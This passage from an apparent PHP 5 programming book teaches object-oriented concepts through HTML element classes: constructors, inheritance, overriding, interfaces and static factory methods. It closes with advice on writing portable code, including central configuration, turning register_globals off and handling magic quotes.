A constructor is a special method that’s used when we first instantiate or create the object. The constructor method is named __construct no matter what the class’s name is. Since the constructor is called when we create an object from a class, it’s in this method that we set any default values for the object’s properties—also referred to as instance variables, the properties of a specific instance of a class—or anything else that’s needed to initialize the object. In our example class, we initialized the various properties that we needed in order to create the paragraph element. Another common example is an order class for a shopping cart—the cart is initialized in the __construct method, where the customer number is set, the number of items in the cart is set to zero, and the cart balance is set to zero dollars.

A destructor is the constructor’s complement. Like the constructor, the destructor has a special name, __destruct, that’s used no matter what the class’s name is. __destruct is also a special method that runs immediately before an object is destroyed. It’s in the destructor that we tie up any loose ends we may have, for instance, closing a database connection or a file handle.

Magic Methods
__construct and __destruct are examples of what are known as magic methods. Magic methods are a collection of methods that perform special internal PHP class functions. They all begin with __ (double underscore) and you can read more about them in The PHP Manual.19 For example, the __toString method is called when an object created from the class is converted to a string. This comes in very handy, as you will see.

Creating Objects
Now that we know what a class is, it’s time to talk about objects.
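Before we go further, here’s a minimal sketch of the shopping cart described above, which happens to create an object along the way. The ShoppingCart class, its method names, and the in-memory stream that stands in for a log file are all assumptions made for illustration; they don’t come from the book’s code archive.

```php
<?php
// Hypothetical ShoppingCart class; every name here is an assumption made
// for this sketch.
class ShoppingCart
{
    private $customerNumber;
    private $itemCount;
    private $balanceInCents;
    private $log;

    public function __construct($customerNumber)
    {
        // Put the new object into a known starting state.
        $this->customerNumber = $customerNumber;
        $this->itemCount      = 0;
        $this->balanceInCents = 0;
        // Stand-in for a real resource such as a log file.
        $this->log = fopen('php://memory', 'w+');
    }

    public function addItem($priceInCents)
    {
        $this->itemCount++;
        $this->balanceInCents += $priceInCents;
        fwrite($this->log, "added item costing $priceInCents\n");
    }

    public function getItemCount()
    {
        return $this->itemCount;
    }

    public function getBalanceInCents()
    {
        return $this->balanceInCents;
    }

    public function __destruct()
    {
        // Tie up loose ends: release the resource opened in the constructor.
        fclose($this->log);
        echo 'Cart for customer ' . $this->customerNumber . " closed\n";
    }
}

$cart = new ShoppingCart(1001);
$cart->addItem(1999);
$cart->addItem(501);

$itemCount = $cart->getItemCount();        // 2
$balance   = $cart->getBalanceInCents();   // 2500

echo $itemCount . ' items, ' . $balance . " cents\n";

unset($cart);   // the last reference is gone, so __destruct() runs here
```

Storing the balance in cents rather than dollars is a design choice of the sketch: it keeps the arithmetic in integers and sidesteps floating point rounding.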
As we saw earlier in this chapter, an object is the item that’s created or, in object oriented terminology, instantiated, using the class as the blueprint. Thus the object is the actual implementation of the class. Because of this, we can instantiate multiple objects of the same class, each with its own individual characteristics and states—just as a single blueprint can be used to build multiple cars. The cars may all be the same make and model, but they’re all driving at different speeds, and have different mileage totals.

19 http://www.php.net/manual/en/language.oop5.magic.php

  • 39. Let’s look at some code that will help clarify the concept of objects:

HTMLParagraph.php (excerpt)
    $para = new HTMLParagraph('Hello world!');
    echo $para->getSource();

In the first line above, I instantiate the object with the new keyword, being sure to pass along any data that the constructor will need. Basically, that line of code instructs PHP to use the HTMLParagraph class to make a new object, and place that object in the $para variable. Since the object in $para is an implementation of the HTMLParagraph class, it has all the functionality and properties of that class. The output of the above code listing will be:

    <p>Hello world!</p>

The $this Variable
Now that we understand the difference between an object and class, I want to back up a bit. In the HTMLParagraph class file, you’ll find that the $this variable appears in the class methods—the getSource method, for example:

HTMLParagraph.php (excerpt)
    public function getSource()
    {
      return '<p>' . $this->content . '</p>';
    }

Within any method, including the constructor, the $this variable points to the object in which the method is running, and allows the method to access other methods and variables that belong to that particular object. So even though we may have two HTMLParagraph objects running the same class function code, when we call the getSource function on one of them, $this will point to the object that owns the function we called—the one in which we’re retrieving the HTML source. The other object, and the content it holds, is left untouched.

  • 40. The -> (arrow) operator is the syntax we use to access an attribute or method that’s named within the object. You can use this operator to access an object’s own properties and methods within the script, as well as within the object itself.

Treating an Object Like a String
If you recall, the __toString method is called when an object created from the class is converted to a string. This will be very handy for our HTMLParagraph as it’ll allow our paragraph objects to be used in string concatenation. Here’s our __toString method:

HTMLParagraph.php (excerpt)
    public function __toString()
    {
      return $this->getSource();
    }

Our __toString method calls the getSource method, which returns the HTML source for our paragraph. So now it’s possible to use it in this way:

HTMLParagraph.php (excerpt)
    <?php
    $para2 = new HTMLParagraph('The __toString method makes life' .
        ' easy!');
    echo "<h1>The Magic __toString Method</h1>\n";
    echo $para2;
    ?>

The output from the above code listing will be:

    <h1>The Magic __toString Method</h1>
    <p>The __toString method makes life easy!</p>
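To see $this and __toString working together, the following sketch repeats the chapter’s HTMLParagraph class so that it runs on its own, then creates two objects from it. The variable names and paragraph text are my own choices for illustration.

```php
<?php
// Self-contained copy of the chapter's class so this sketch runs alone.
class HTMLParagraph
{
    private $content;

    public function __construct($content = '')
    {
        $this->content = $content;
    }

    public function getSource()
    {
        // $this is whichever object the method was called on
        return '<p>' . $this->content . '</p>';
    }

    public function __toString()
    {
        return $this->getSource();
    }
}

// Two objects built from one class, each holding its own content.
$intro = new HTMLParagraph('First paragraph.');
$outro = new HTMLParagraph('Second paragraph.');

// Concatenation converts each object to a string via __toString().
$page = "<h1>Two objects, one class</h1>\n" . $intro . "\n" . $outro . "\n";

echo $page;
```

Both objects run exactly the same getSource code, yet each returns its own content, because $this refers to a different object in each call.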
  • 41. Inheritance
Inheritance is another of the fundamental pieces of the object oriented paradigm and is an important aspect of its expressive power. The term refers to a relationship in which one class is defined as being a child or subclass of another. The child class inherits the methods and properties defined in the parent class, and can change them or add more of its own. Inheritance allows you to define the common methods and properties of a class that you’d like all the child classes to share.

Our HTMLParagraph class creates an adequate HTML paragraph element, but there are a lot more HTML elements besides paragraphs and they all share some common features. Let’s create a parent class called HTMLElement and add all the common methods and properties:

HTMLElement.class.php (excerpt)
    <?php
    class HTMLElement
    {
      protected $content;
      protected $tagname;
      protected $attributes;

Thinking about the common properties of HTML elements, we add two new properties, $tagname and $attributes, to store the tag name and attributes of the HTMLElement respectively. Notice that I’ve declared the properties protected. This allows child classes to have access in order to redefine them. If we’d declared the properties private, the child classes wouldn’t be able to access them.

The __construct method now takes a second argument for the element attributes:

HTMLElement.class.php (excerpt)
      public function __construct($content, $attributes = array())
      {
        $this->content = $content;
        $this->attributes = $attributes;
      }
  • 42. 18 The PHP Anthology Our new getSource method now has all the smarts to create the source for any HTML element as long as the $tagname property is defined: HTMLElement.class.php (excerpt) public function getSource() { return '<' . $this->tagname . $this->getAttributeSource() . '>'. $this->content . '</' . $this->tagname . '>'; } The getSource method will also loop through the attributes array and assemble the HTML source string for the element’s attributes. It does this by calling the getAttributeSource method. The getAttributeSource method builds and returns the source string for the HTML element’s attributes, if any are present: HTMLElement.class.php (excerpt) public function getAttributeSource() { $attributes = ''; if (count($this->attributes)) { foreach ($this->attributes as $attrnme => $attrval) { $attributes .= ' ' . $attrnme . '="' . $attrval . '"'; } } return $attributes; } Finally, the __toString magic method remains the same as the previous version—it already does what we need it to, and it can be used for any HTML element:
  • 43. Introduction 19 HTMLElement.class.php (excerpt) public function __toString() { return $this->getSource(); } } ?> You can see that marking our HTMLParagraph class as a child of HTMLElement will be far easier than building the HTMLParagraph class from scratch—most of the work has already been done for us. We use the extends keyword to indicate the relation­ ship: HTMLParagraph.class.php (excerpt) <?php require_once 'HTMLElement.class.php'; class HTMLParagraph extends HTMLElement { protected $tagname = 'p'; public function __construct($content, $attributes = array()) { parent::__construct($content, $attributes); } } ?> HTMLParagraph is now a child of HTMLElement. Alternatively, we could say that HTMLElement is the parent or superclass of HTMLParagraph. We’ve redefined the $tagname property and changed the constructor method. Just ignore the parent::__construct($content, $attributes); part for now, I’ll explain it very soon. Now we can instantiate the child class, gain access to the getSource method, and—because we’ve redefined the $tagname property—the HTML source is output appropriately for an HTML paragraph element:
  • 44. childClass.php (excerpt)

    <?php
    require 'HTMLParagraph.class.php';
    $para = new HTMLParagraph("The object oriented programming\n" .
        " paradigm is an approach to programming that's intended\n" .
        " to encourage the development of well-structured and\n" .
        " maintainable applications.",
        array(
          'id' => 'oop_intro',
          'class' => 'introduction'
        )
    );
    echo "<h1>OOP in PHP 5</h1>\n";
    echo $para;
    ?>

The output for the above code will be:

    <h1>OOP in PHP 5</h1>
    <p id="oop_intro" class="introduction">The object oriented programming
     paradigm is an approach to programming that's intended
     to encourage the development of well-structured and
     maintainable applications.</p>

This example shows the basics of how inheritance works, but the real power of this capability cannot be demonstrated without discussing overriding, the mechanism by which a child class can alter the methods and properties of its parent class.

Overriding Methods and Properties

It’s perfectly acceptable to give a method or property in the child class the same name as a method or property in the parent class; doing so overrides the parent’s method or property. In our HTMLParagraph class we override the $tagname property of the parent HTMLElement class. When we call HTMLParagraph->getSource and it grabs the $tagname value, it retrieves the overridden value p.

To demonstrate, let’s create another child class; I give you the HTMLImage class. HTML image tags are constructed slightly differently (they have no end tag), so we’ll need to override the getSource method to handle this unique situation:
  • 45. HTMLImage.class.php (excerpt)

    <?php
    class HTMLImage extends HTMLElement
    {
      ⋮ the usual properties and constructor function
      public function getSource()
      {
        return '<'. $this->tagname . $this->getAttributeSource() .' />';
      }

Overriding a Method? Watch your Arguments!

When a child class overrides a method, PHP prefers (though it doesn’t require) the child class method to have the same number of arguments as the parent class method. If the number of arguments differs between the child and parent class versions of the method, your code will remain perfectly legal in terms of object oriented programming, and it’ll still run perfectly. However, it will cause an E_STRICT error to appear if E_STRICT warnings are enabled in php.ini.[20]

[20] E_STRICT warnings are defined by The PHP Manual as “Run-time notices. Enable [these notices] to have PHP suggest changes … which will ensure the best interoperability and forward-compatibility of your code.” [http://www.php.net/errorfunc/]

You can also have the child class make use of the parent class’s method or property internally, even while overriding it. To ensure our classes produce quality HTML I want to make sure all image elements have an alt attribute, even if it’s only to alert the developer that it’s missing. We’ll override the getAttributeSource method:

HTMLImage.class.php (excerpt)

      public function getAttributeSource()
      {
        if (!array_key_exists('alt',$this->attributes)) {
          $this->attributes['alt'] = 'This image needs alt text';
        }
        return parent::getAttributeSource();
      }
    }
    ?>
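To see the two overrides working together, here is a condensed sketch that can be run on its own. The classes Element and ImageElement are hypothetical, simplified stand-ins for the chapter's HTMLElement and HTMLImage (for example, the constructor here takes only the attributes array), so treat it as an illustration of the technique rather than the book's listing.

```php
<?php
// Hypothetical, simplified stand-in for the chapter's HTMLElement.
class Element
{
    protected $tagname;
    protected $attributes;

    public function __construct(array $attributes = array())
    {
        $this->attributes = $attributes;
    }

    public function getAttributeSource()
    {
        $source = '';
        foreach ($this->attributes as $name => $value) {
            $source .= ' ' . $name . '="' . $value . '"';
        }
        return $source;
    }
}

// Hypothetical, simplified stand-in for the chapter's HTMLImage.
class ImageElement extends Element
{
    protected $tagname = 'img';

    // Override: add a default alt attribute, then delegate to the parent
    // so the attribute-building loop isn't duplicated.
    public function getAttributeSource()
    {
        if (!array_key_exists('alt', $this->attributes)) {
            $this->attributes['alt'] = 'This image needs alt text';
        }
        return parent::getAttributeSource();
    }

    // Image tags have no end tag, so the source is built differently.
    public function getSource()
    {
        return '<' . $this->tagname . $this->getAttributeSource() . ' />';
    }
}

$logo = new ImageElement(array('src' => 'php.gif'));
$source = $logo->getSource();
echo $source . "\n";
```

Both overridden methods keep the same (empty) argument list as their parent versions, which stays on the right side of the E_STRICT advice in the sidebar above.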
  • 46. 22 The PHP Anthology We can use the parent keyword and the :: operator to call the parent class’s method. This trick saves us from duplicating functionality already contained in the parent class. Note that we can call the parent class by name to achieve exactly the same result. For example, the above parent method call could have also been written like this: return HTMLElement::getAttributeSource(); Here, we’ve replaced the parent keyword with the name of the HTMLElement class. Although the output is exactly the same, using parent saves us from having to re­ member the name of the parent class while working in the child, and is the recom­ mended syntax.21 Overriding Constructors Most object-oriented languages—Java, for example—will run the constructor of a given parent class automatically, before running an overriding constructor in a child class. This behavior is known as cascading constructors. PHP doesn’t have this feature. If you create a constructor in a child class in PHP, be aware that you’re completely overriding the parent class’s constructor. You must call that constructor explicitly from your new constructor, for example, using parent::__construct(), if you want the parent class to handle its share of the object’s initialization. We can see overriding in action in this example: overriding.php (excerpt) <?php require 'HTMLImage.class.php'; $logo = new HTMLImage('', array( 'id' => 'logo', 'src' => 'php.gif' ) 21 PHP’s double colon operator (::) is called the scope resolution operator, or Paamayim Nekudotayim. This may seem like a strange choice for naming a double-colon, but while writing the Zend Engine 0.5 (which powers PHP 3), that’s what the Zend team decided to call it. It actually does mean double- colon—in Hebrew!
  • 47. Introduction 23 ); echo $logo; ?> The above code will output the following: <img id="logo" src="php.gif" alt="This image needs alt text" /> If you examine the output, you can see that the HTMLImage->getAttributeSource method has outputted the appropriate attributes as per our intention. Object Aggregation and Composition In addition to inheritance, objects can interact in other ways; for example, one object can use another object to perform a function either by creating the object to be used to perform the function or by receiving it through a method’s arguments. Such in­ teractions demonstrate the expressive power of the object oriented paradigm. There are two ways in which one object can use another: aggregation and composi­ tion. Aggregation Aggregation occurs when one object is given another object on a “temporary loan.” The second object will usually be passed to the first through one of the first object’s methods—for instance, the constructor. The first object is then able to call methods in the second, which means it can use the functionality stored in the second object for its own purposes. Let’s look at an example of aggregation in action. We’ll build an HTMLUnorderedList class that can hold an array of HTMLListItem objects. The HTMLListItem class is a simple extension of the parent HTMLElement class: HTMLListItem.class.php (excerpt) <?php require_once 'HTMLElement.class.php'; class HTMLListItem extends HTMLElement { protected $tagname = 'li';
  • 48. 24 The PHP Anthology public function __construct($content, $attributes = array()) { parent::__construct($content, $attributes); } } ?> The HTMLUnorderedList class, however, has a new property and method: HTMLUnorderdList.class.php (excerpt) <?php require_once 'HTMLListItem.class.php'; class HTMLUnorderedList extends HTMLElement { ⋮ other properties… private $items = array(); ⋮ constructor method… public function addListItem(HTMLListItem $item) { $this->items[] = $item; } public function getSource() { if (count($this->items)) { $this->content = ''; foreach ($this->items as $item) { $this->content .= $item->getSource(); } } return parent::getSource(); } } ?> The addListItem method takes an HTMLListItem object as an argument and adds it to the array of list items stored in the $items property. The getSource method
  • 49. has also been overridden to be able to construct the HTML list element using the list items.

Type Hinting Demystified

As you can see, I used type hinting in the addListItem method. A type hint is a specification that an argument for a method must be an object of a specified class. If the script doesn’t pass the method an object of the specified type, it will cause a fatal error (or, as of PHP 5.2, a recoverable error) to be raised. In the example, addListItem(HTMLListItem $item) requires the script to pass the method an HTMLListItem object.

Type hinting can also be applied to object interfaces, which we discuss in the section called “Object Interfaces”. The convention in PHP programming is, in fact, to only type hint interfaces, not concrete class implementations. However, we can be forgiven for doing so in our simple OOP introduction.

Composition

Composition describes the style of object oriented programming where one object completely owns another object; that is, the first object was responsible for instantiating the second object. There are many cases in which composition can be useful, although it’s most commonly used when it’s likely that the first object will be the only one that needs to use the second.

For example, let’s create a class to represent a web site logo graphic. We want the class to be able to output the HTML for the logo image, and to do that, it uses our HTMLImage class like so:

WebsiteLogo.class.php (excerpt)

    <?php
    require_once 'HTMLImage.class.php';
    class WebsiteLogo
    {
      private $img;
      public function __construct($imagesrc, $title, $alt)
      {
        $this->img = new HTMLImage('',array('src' => $imagesrc,
            'title' => $title,
            'alt' => $alt,
            'class' => 'sitelogo'));
  • 50. 26 The PHP Anthology } public function getSource() { return $this->img->getSource(); } public function __toString() { return $this->getSource(); } } ?> Since the HTMLImage class already knows how to write the HTML for the image tag, we can use an instance of HTMLImage and just supply the correct image source, title, and alternative text for our web site logo graphic. We are also able to enforce the output of a specific class name in our web site logo <img> tag. When the WebsiteLogo->getSource method is called, it just calls the getSource method for the HTMLImage object. Using Aggregation and Composition: Benefits and Pitfalls In terms of practical development, it’s important to know when to apply aggregation or composition. How can you tell when object A should aggregate or compose object B? Ask yourself, “What happens if object A dies? Will object B still be alive?” If object B is required to outlive the death of object A, object A should aggregate object B. But if it’s better that object B dies when object A dies, then object A should compose object B. Aggregation offers the advantage of lower overhead than composition, because a single object will be shared by many other objects. It’s certainly a good idea to ag­ gregate your database connection class; composing it with every object that wants to make a query may result in multiple connections to your database, which will cause your application to grind to a halt whenever it attracts high levels of traffic. Composition makes classes easier to work with because they’re self-contained. The code that uses the class doesn’t have to worry about passing it the other objects it needs, which, in a complex application, can often become so tricky as to require us to develop a design workaround. Another advantage of composition is that, when
  • 51. Introduction 27 working with code that uses it, we know exactly which class has access to the composed object. One of the problems with aggregation is that an object which shares the aggregated object may do something to its state that makes the object unusable by the other classes that are supposed to be able to use it. Composition produces tighter coupling—that is, greater dependency—between the two objects involved, making it more difficult to reuse one without the other. Polymorphism Another powerful aspect of object oriented programming is polymorphism—the ability of different objects to share an interface and thus become interchangeable. An interface is the name given to one or more methods that let you use a class for a particular purpose. For example, imagine you have two database connection classes—one for MySQL, and one for PostgreSQL. As long as both of them offered a query method, you could use them interchangeably for running queries on different databases—of course, your SQL would have to be valid in both databases. In this case, the query method would represent a simple interface that the two classes shared. Classes sharing the same interface are often inherited from a parent class that makes the common methods available, or implements a common interface. This concept is best illustrated by the following examples. Abstract Classes and Methods Our parent class, HTMLElement contains all the common functionality for all our child classes. However, we don’t really want to be able to instantiate an object from the HTMLElement class—it has no tag name information and wouldn’t output any useful HTML. So we use the abstract keyword to make this an abstract base class, which provides an outline of the minimum functionality required for an HTMLElement object: the common getSource and getAttributeSource methods. We extend the HTMLElement class to define concrete child classes, each of which creates a specific approach to building an HTML element:
  • 52. AbstractHTMLElement.class.php (excerpt)

    <?php
    abstract class HTMLElement
    {
      ⋮ common properties and methods…
    }
    ?>

The terms abstract and concrete refer to class usage, in particular whether a class is intended to be used directly or not. An abstract class is one that has some functionality or structure that’s to be shared by all subclasses, though the class itself can’t be used directly. In other words, we’re not supposed to create objects from an abstract class. If we try to do so, we’ll raise a fatal error. A concrete class is a subclass of the abstract class from which we can create objects.

There are more ways to use the abstract keyword than just at the class level. Typically, an abstract class also has one or more empty methods that don’t do anything other than demand that given child classes implement them. For example, we could add a hypothetical method called addContent; we only include the method name and parameters:

AbstractHTMLElement.class.php (excerpt)

    <?php
    abstract class HTMLElement
    {
      ⋮ common properties and methods…
      abstract public function addContent(HTMLElement $element);
    }
    ?>

Defining an abstract method in this way allows the author of the abstract class to indicate the intention of the class without dictating the implementation. In this example the abstract addContent method must accept a single argument containing an HTMLElement object. The inclusion of this abstract method makes it compulsory for any child classes to implement the method. While the intention of this abstract method may be to force any HTMLElement object to add a child HTML element to
  • 53. its inner content, each HTML element achieves this in different ways. For example, some HTML elements can only contain child elements of a certain type; others can’t contain any child elements at all. If you’re curious to learn some more about abstraction, check out the manual page.[22]

[22] http://www.php.net/manual/en/language.oop5.abstract.php

Object Interfaces

An object interface is the equivalent of an agreement to implement certain methods. It differs from an abstract class in that it contains no implementation at all. Interfaces are defined by the interface keyword; they’re written in the same way as classes, except that the methods have no contents at all. Here’s an example of an interface:

HTMLSource.interface.php (excerpt)

    <?php
    interface HTMLSource
    {
      public function getSource();
    }
    ?>

This is a very simple interface but it’ll do for an example. Here, we’ve defined one method: getSource. Any class that implements this interface must implement this method; failure to do so will raise a fatal error. As the intention of interfaces is to define a public interface, all methods must be declared public. Our intention with the interface above is to indicate which objects can output an HTML source string.

To indicate that a class implements a specific interface, you use the implements keyword. Here’s an example of this usage in a modification of our previously defined WebsiteLogo class:

WebsiteLogo2.class.php (excerpt)

    <?php
    require_once 'HTMLImage.class.php';
    require_once 'HTMLSource.interface.php';
    class WebsiteLogo implements HTMLSource
    {
  • 54. 30 The PHP Anthology ⋮ class properties and methods… public function getSource() { return $this->img->getSource(); } } ?> You may be wondering, “So what’s the big deal?” Well, let’s finish off our explana­ tion of object interfaces by examining a situation where interfaces will come in handy. Let’s say for the purposes of this demonstration that the abstract HTMLElement class also implements the HTMLSource interface. It already does so by virtue of the fact that it has a method called getSource, but indicating the fact in code allows us to test it for sure. We’d indicate the implementation like this: AbstractHTMLElement2.class.php (excerpt) <?php require_once 'HTMLSource.interface.php'; abstract class HTMLElement implements HTMLSource { ⋮ common properties and methods… } ?> To make use of this new feature of our codebase, let’s change the base class imple­ mentation of the getSource method: AbstractHTMLElement2.class.php (excerpt) public function getSource() { if ($this->content instanceof HTMLSource) { $html = $this->content->getSource(); } else { $html = $this->content; }
  • 55.
        return '<' . $this->tagname . $this->getAttributeSource() . '>'
            . $html . '</' . $this->tagname . '>';
      }

With this modified function, any object based on the HTMLElement class can now have as its content any object that implements the HTMLSource interface. This could be an object based on any one of our HTMLElement classes previously defined, or even an object based on the WebsiteLogo class. When getSource is called, the instanceof type operator is used to check the type of the content property: if it’s an object that implements the interface, we call its getSource method; otherwise, we assume it’s a string value and use that. The operator allows us to check that an object implements the interface, allowing us to make use of it without having to know exactly what kind of object it is.[23]

[23] You can read more about interfaces here: http://www.php.net/manual/en/language.oop5.interfaces.php and more about the instanceof operator here: http://www.php.net/manual/en/language.operators.type.php

Static Properties and Methods

Static properties and methods differ from object properties and methods in that they can be accessed without the instantiation of an object. This feature is particularly handy at times when you want to use a method of a class without having to instantiate an object to do so. Let’s take a closer look at how static properties work.

Since having to type in new HTMLParagraph(…) whenever we wish to create a paragraph is slightly tedious, we’ll want to make it easier. Let’s make a class called HTML, which we can use without having to instantiate any objects, to create our objects for us.[24]

[24] This is an example of the Factory design pattern. Read more about patterns on the manual page at http://www.php.net/manual/en/language.oop5.patterns.php.

We use the static keyword to indicate that the methods are static:
  • 56. 32 The PHP Anthology HTML.class.php <?php require_once 'HTMLParagraph.class.php'; class HTML { public static function p($content, $attributes = array()) { return new HTMLParagraph($content, $attributes); } } ?> Here’s an example of how the HTML class could be used: echo HTML::p('This is a static method!'); This example would output as follows: <p>This is a static method!</p> Notice that when we use a static method, we use the :: operator, rather than the object -> operator, to access the method. You may have noticed that this is the same operator used to call a method of the parent class of the current object, as in parent::method(). The parent class usage is a special case where inheritance is concerned, as the parent class method retains access to the object’s instance data, and therefore isn’t static. $this Can’t be Used in Static Methods As static methods are used without the instantiation of an object, the $this variable can’t be used in static methods. Now to extend this example a bit—and possibly to excite your interest in OOP in PHP 5 into the bargain—imagine for a moment that we’ve added a static method and a corresponding class for each possible HTML element to our HTML class. Re­ membering that one HTMLElement object can be passed to the constructor of another HTMLElement object as its content, we can now create methods for all HTML elements that we can use as demonstrated in the following example:
  • 57.
    echo HTML::div(HTML::h1('Welcome to my web site!'),
        array('id' => 'header'));

This example would output the following HTML:

    <div id="header"><h1>Welcome to my web site!</h1></div>

Taking the above example as your goal, I’ll leave the implementation of such an API up to you. Come on, with this introduction to OOP under your belt, it should be easy!

How do I write portable PHP code?

Not all PHP installations are the same. Depending on version and configuration settings in your php.ini file, your script may or may not run correctly on another server on which PHP is installed. However, you should consider adopting a number of generally accepted best practices to make life easier and minimize the need to rewrite code for other servers.

Solution

The list of generally accepted best practices includes keeping your configuration central, writing your code to be reusable, always using the full PHP tags, always using superglobal variables and never relying on register_globals, and always checking for magic quotes.

Keeping Configuration Central

For most PHP applications, it will be necessary to write configuration information describing the environment in which the script will run, including database usernames and passwords, directory locations, and so on. As a general rule, try to keep the majority of this information in a single place (maybe even a single file) so that when you need to modify the information, you can make all the necessary changes in one place. That said, when you’re building modular applications, you may want to store configuration elements that are local to a specific module within the module itself, rather than in a central location.

The way each of us chooses to store this information is a matter of personal choice. In some cases, it may be worth considering the use of an XML file, or storing some
  • 58. of the information in a database. It’s also worth being aware of the parse_ini_file function.[25]

[25] http://www.php.net/manual/en/function.parse-ini-file.php

A simple but effective storage mechanism is to place all the settings into a single file as PHP constants, which makes them available from any function or class in your application. Here’s an example:

    <?php
    // Configuration settings
    define('DOMAIN', 'sitepoint.com');

    // In another script
    echo 'The domain is ' . DOMAIN;
    ?>

Constants need to be used with caution, though. In order for your functions and classes to be reusable in other applications, they shouldn’t depend on constants of a fixed name; rather, they should accept configuration information as arguments, an approach that will allow for greater code reuse. In such cases, it’s best to use PHP variables in your central configuration file, which you can then pass to functions and classes as required.

For example, when we’re connecting to a database, we can identify a number of variables that we need to have stored in a central location: the server hostname, the username, and the password. We can store these in a file called, for instance, config.php, load it with require_once, and place the file outside the public web directories. This approach helps to ensure that users don’t accidentally browse to the file containing this critical information, a situation that would place the site’s security at risk.

Recycling and Reuse

It’s easy to say, but if you find yourself writing any more than one PHP script in your life, you need to start thinking about ways to make your code reusable before you suffer premature hair loss! If you end up working on other sites or applications, you’ll appreciate having ready code that you can simply plug into your new project. Also, if you’re writing code
  • 59. that other people will integrate with existing applications on their web sites, you need to package it in a form that doesn’t place requirements on the code they’re already using. For example, if your application has some kind of user authentication system, you’ll want to ask yourself if it can be integrated with the systems that site owners are already using, systems with which large databases of users are likely already associated.

The best approach is to write object oriented code with a mind to creating reusable components, or pieces of functionality. Some people argue that creating PHP applications using object oriented code results in slower-running applications and should be avoided at all costs. What they forget to mention is that object oriented programming delivers a drastic increase in your own performance as a developer. After all, fast programmers cost more than fast microprocessors!

A number of important points must be considered when you’re measuring the potential of your code for reuse:

■ What happens when the project’s requirements change?
■ How easy is it to add new features to your code?
■ Are you still able to understand the code after a long period of time?
■ Can your code be integrated easily with other applications?
■ Will the assumptions you’ve made in your code apply to your work on other sites?

This book will provide many hints and suggestions to help you to write reusable code, although an in-depth analysis of PHP application design as a whole is beyond its scope. As you read this book, you should be able to identify some of the critical factors as subjects for further investigation. You have one main responsibility to yourself as an experienced PHP developer: to keep expanding your knowledge of the more esoteric aspects of software development, such as design patterns and enterprise application architecture, as a means to improve your development technique and, more importantly, save yourself time. 
The broader your knowledge, the lower the risk of failure when you land the next big project. Portability Essentials Here are three steps you should take to ensure the portability of your PHP code.
  • 60. Using the Full <?php ?> Tags

PHP supports a variety of tag styles to mark up sections of your code, including the short tags (<? ?>), and ASP-style tags (<% %>). Tag style support is controlled from php.ini with the settings short_open_tag and asp_tags. Be aware, though, that while you may have these settings switched on, other server administrators may not, which can be problematic. The short tag style, for example, causes issues when the PHP is mixed with XML documents that use processing instructions like this:

    <?xml version="1.0"?>

If you have a document that contains PHP and XML, and you have the short_open_tag setting turned on, PHP will mistake the XML processing instruction <?xml for a PHP opening tag.

It’s possible that your code will need to run in environments where short_open_tag and asp_tags are both turned off. The best way to ensure that your code still works when these settings are disabled is to get into the habit of always using the <?php ?> tag style; otherwise, you may have a lot of code rewriting to do in the future.

Turning register_globals Off

Make sure the following code is in place in your php.ini file:

    register_globals = off

This will force you to access incoming data via the special predefined superglobal variables (e.g. $_GET['username']), ensuring there won’t be a conflict with variables you’ve created in your script.

The same result can be achieved by placing the following code in your Apache .htaccess file:

    php_flag register_globals off

Further information can be found in The PHP Manual,[26] and in Kevin Yank’s article, Write Secure Scripts with PHP 4.2! on SitePoint.[27]

[26] http://www.php.net/manual/en/security.globals.php
[27] http://www.sitepoint.com/article/write-secure-scripts-php-4-2/
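As a rough illustration of reading incoming data through a superglobal, here is a minimal sketch. The helper name requestValue and the 'guest' default are assumptions made for this example; they aren't part of PHP or of the book's code.

```php
<?php
/**
 * Hypothetical helper: fetch one string value from a request array
 * such as $_GET, falling back to a default when it is missing.
 */
function requestValue(array $source, $key, $default = null)
{
    if (!array_key_exists($key, $source)) {
        return $default;
    }
    // A query string like ?username[]=x yields an array; treat anything
    // that isn't a string as missing.
    return is_string($source[$key]) ? $source[$key] : $default;
}

// With register_globals off, a request for page.php?username=alice never
// creates a $username variable; the value lives only in $_GET.
$username = requestValue($_GET, 'username', 'guest');

// Escape the value before echoing it back into HTML.
echo 'Hello, ' . htmlspecialchars($username, ENT_QUOTES, 'UTF-8') . "\n";
```

Passing the array in as an argument, rather than reading $_GET inside the function, keeps the helper usable with $_POST or $_COOKIE and makes it easy to exercise with a plain array.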
  • 61. Checking for Magic Quotes

Magic quotes is a feature of PHP that’s intended to help prevent security breaches in sites developed by PHP beginners.

The magic quotes feature adds escape characters (backslashes that indicate that quotation marks should be included in the string, rather than marking the end of the string) to incoming URL query strings, form posts, and cookie data automatically, before your script is able to access any of these values. Should you insert the data directly into your database, there’s much less risk that a malicious user might be able to tamper with the database, provided magic quotes functionality is switched on.

For beginners, this is certainly a useful way to prevent disasters. However, once you understand what SQL injection attacks are, and have developed the habit of writing code to avoid them,[28] the magic quotes functionality can become more of a problem than it’s worth.

[28] See “How do I protect my web site from an SQL injection attack?” in Chapter 2 for more on SQL injection attacks.

Magic quotes functionality is controlled by a PHP configuration setting, magic_quotes_gpc, which can be set to be either on or off.

My own preference is always to have magic quotes switched off, and to deal with the task of escaping data for SQL statements myself. Unfortunately, this means that the code I write won’t port well to PHP installations where magic quotes is switched on: I’ll end up with backslashes in my content. Thankfully, to deal with this problem, PHP provides the function get_magic_quotes_gpc, which can be used to find out whether the magic quotes functionality is switched on.

To keep the code in this book portable, we’ll use a simple file that strips out magic quotes, should this functionality be enabled:
  • 62. 38 The PHP Anthology <?php /** * Checks for magic_quotes_gpc = On and strips them from incoming * requests if necessary */ if (get_magic_quotes_gpc()) { $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE); } ?> If we include this code at the start of any file in which we accept data from a query string, a form post, or a cookie, we’ll remove any slashes added by magic quotes, should this functionality be switched on. Summary Are you ready to jump in and try the PHP 5 waters? This chapter has shown you how to keep your head up and tread water. You may not be a professional swimmer yet, but with The PHP Manual by your side, as well as this book, we’ll keep you afloat, introduce you to some of the beauty of the PHP ocean, and eventually show you how to glide through the waters with grace!
